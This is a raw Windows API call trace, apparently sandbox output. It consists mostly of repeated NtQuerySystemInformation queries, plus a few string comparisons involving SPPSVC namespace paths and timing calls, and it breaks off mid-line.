[0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0272.876] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca00, Length=0x50, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7d0, Length=0x28, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x28, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc930, Length=0x38, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x20, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x28, ResultLength=0x0) [0272.890] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x28, ResultLength=0x0) [0272.890] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x28, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x28, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x28, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca30, Length=0x38, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0272.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcb60 | out: lpSystemTimeAsFileTime=0xc751dfcb60*(dwLowDateTime=0x3ef5e52, dwHighDateTime=0x1d5fb6f)) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc18, Length=0x50, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb50, Length=0x28, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0272.901] GetTickCount () returned 0x1184871 [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x28, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x28, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x38, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x20, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc938, Length=0x58, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x38, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0272.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, 